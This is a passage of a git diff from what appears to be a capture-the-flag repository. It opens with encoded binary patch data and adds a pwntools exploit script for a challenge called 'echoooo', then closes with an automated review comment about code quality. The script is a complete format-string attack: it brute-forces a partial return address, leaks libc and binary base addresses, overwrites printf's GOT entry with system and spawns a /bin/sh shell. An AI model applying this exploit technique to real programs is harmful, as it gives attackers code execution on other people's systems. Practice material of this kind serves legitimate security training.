zBH%>8iNF^(0-^bmadCpekbozma|BQ8rfE%JEqvjO>1uw4@!3|1=dKYvezJ{eu|b$$ z$Z35y$v?ZSr%`3xBXLa{i}fI&uXiX)R4?j=x>p3Fy;rB1jQ#@hV$oYdpF5LXj z2(2r(7Z~zM9Fhd>5VT9sK|zNF9TRk1&_jaS{kCr2d~;xRXLl~8T zw&8*Gp+X<*8rv1GCrza~ibn-HLk{t!ua9RqXzITQ 
z8RB^lJgvIQ;-z)sW+M-yr&$Tb`?!jIqL&aOhtEkjt7Btg9}SXw1wLWJmkXTH^H&() zI(ip8H6Ii8#PTq;z~N#u<1+v_mRo#|qcWr+I9xExMbBjpic`7zSGumJxSs`V$$H7` zg6GTmd6r8S&S=M<0q$Zm+i^nZ+w1vjj?e5@f8u^-w(mv2=R+KDg{x zF7fLsJrCERGe|MeM?dy<84%^-+Ad5-_?fW`#|2{|k5<6HC;a^3I*DuZIb+EE5O9ox zz1+>H?=JKF@5yLcEeET`dRSb|sC|j7re+jvK!GhPQfd~qoQS8DzGS*PmQ>K{0Eb&rpANe(8f@CC8al!N+_{RCN`v~DJ?U^dNZ*BRf*>Y28O`I#3`VuSyUCJ zWqV{xREchFRuoXSD8!l4{PnGoEp3~v625l^K(I-Q5|xDqxp_NNTHCiZMcS2ZEiF5u zJC&W0ruHa$kli$ck-}8 ziW-k;F|k94Rm8Ulu|oGk)!^#-RHeb#JH#r+4MwcUjNL@+Vl3U*NQA+LCCQ|k>Qf;i zmiCeka!Y;7%x3q;$pW!N<-mn?+Y(!R*k07V8G8WenO+IoNDP%?z?&Dy^x(zEmza zm;uKbZO8<5=Mu14Pa-a$NK;!q#FcUN{#dr31>-|0D8isx#*pk)GucEsWnmPM!4=2Q zK;#CK8VmAp1R)#Dsy!^IsrvxLdjXWvywQVdzv%t_ad1MMVQSn4h6UxJgxEj=ob{!_ z7o5;N)DU}65aP>%a6=BjO~#)E|IG>CT;P!g?*>NldnBHr{kLcwCd6Eq@<>;}Q3D6r zhlM@uHx&SxInn<&!Zt$2Y`f8 zwW$8%qWp1Tzgn2i64YM*7~uF@C)v~c|4Cur;W7;I8Zk@u@MgkO0?w#P_B2lLi+?yY zel@fWACyOW4;(mlBzqc992EA{epG+bBl-Z?<5-k<8h0EK_5qM%ve(~085@NR#+2-7 zd~!zEcL_x*-+uky74}U+kH*tsVQ|J|k1?~`KMfehmHacG1RNxvLF{kl_V)iisG02p z!agAE#|<~dvw+Dxd(LJ*A?zoF;#kqr$k^=<+3ab5y$*PV!SvDsgVLGoiT^2N%=M@7 zSnVo9gXUpK-+ukS6!z49^xnjOFb7$f3QW%YsF-y#lCBZ_<3A1n6L=^ tQef-hpzEgRFV4$R-3<%le5Tc)hi%TOT++qcw48nZRzqW%&A`U8e*ke?QSbl& literal 0 HcmV?d00001 diff --git a/random_challs/echoooo/a.py b/random_challs/echoooo/a.py new file mode 100644 index 0000000..753c575 --- /dev/null +++ b/random_challs/echoooo/a.py 
@@ -0,0 +1,69 @@
+#!/usr/bin/python3
+
+from pwn import *
+import re
+
+context.binary = target = ELF("./chal", checksec=False)
+libc = target.libc
+
+# bruteforce lower 12 bits
+def brute():
+ for a in range(1, 256):
+ for b in range(8, 256, 16):
+ r = process()
+ partial_ret = (a << 8) | b
+ write = (0x61 - (partial_ret & 0xff)) & 0xff
+ buf = b"%c"*16 + f"%{partial_ret-16}c%hn".encode()
+ buf += f"%{write}c%48$hhn".encode()
+ r.sendlineafter(b": ", buf)
+ try:
+ r.recvuntil(b"Type")
+ return r, partial_ret
+ except:
+ r.kill()
+ continue
+
+# leak
+r, partial_ret = brute()
+log.info("ret: %#x", partial_ret)
+buf = f"%97c%48$hhn".encode()
+buf += b"AAAA%17$p.%19$p"
+r.sendlineafter(b": ", buf)
+r.recvuntil(b"AAAA")
+leaks = re.findall(r'0x[a-z0-9]+', r.recvS())
+libc.address = int(leaks[0], 16) - 0x29d68
+log.info("libc: %#x", libc.address)
+target.address = int(leaks[1], 16) - 0x1169
+log.info("elf: %#x", target.address)
+
+# write
+partial_ret = int(hex(libc.sym.system)[-4:], 16)
+buf = f"%{partial_ret}c%12$hn".encode().ljust(16, b"A") + b"%110c%48$hhn".ljust(16, b"A") + p64(target.got.printf)
+r.sendline(buf)
+r.sendline(b"/bin/sh")
+
+r.interactive()
+
+"""
+# write
+partial_ret = 0xe068
+write = (0x61 - (partial_ret & 0xff)) & 0xff
+buf = b"%c"*16 + f"%{partial_ret-16}c%hn".encode()
+buf += f'%{write}c%48$hhn'.encode()
+s(buf)
+
+# leak
+buf = f"%97c%48$hhn".encode()
+buf += b"AAAA%17$p.%19$p"
+s(buf)
+r.recvuntil(b"AAAA")
+leaks = re.findall(r'0x[a-z0-9]+', r.recvS())
+libc.address = int(leaks[0], 16) - 0x29d68
+target.address = int(leaks[1], 16) - 0x1169
+log.info("elf: %#x", target.address)
+
+# write
+partial_ret = 0x38f0
+buf = f"%{partial_ret}c%12$hn".encode().ljust(16, b"A") + b"%110c%48$hhn".ljust(16, b"A") + p64(target.got.printf)
+r.sendline(buf)
+"""
\ No newline at end of file
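Review bot: The bare `except:` inside `brute()` also catches `KeyboardInterrupt` and any programming error, so the nested loops cannot be interrupted and genuine failures are hidden; pwntools reports a closed tube with `EOFError`, so `except EOFError:` is the narrow form. When no attempt reaches the `Type` prompt the function falls off the end and returns `None`, and `r, partial_ret = brute()` then fails with an unrelated unpacking `TypeError`; ending the function with `raise RuntimeError("brute(): no attempt reached the prompt")` makes that case explicit. The `# bruteforce lower 12 bits` comment does not describe the loops as written, since `a` and `b` build a 16-bit value whose low nibble is fixed at 8. The triple-quoted block after `r.interactive()` is commented-out code with hard-coded values and calls an `s` helper this file never defines, so it should be dropped rather than committed.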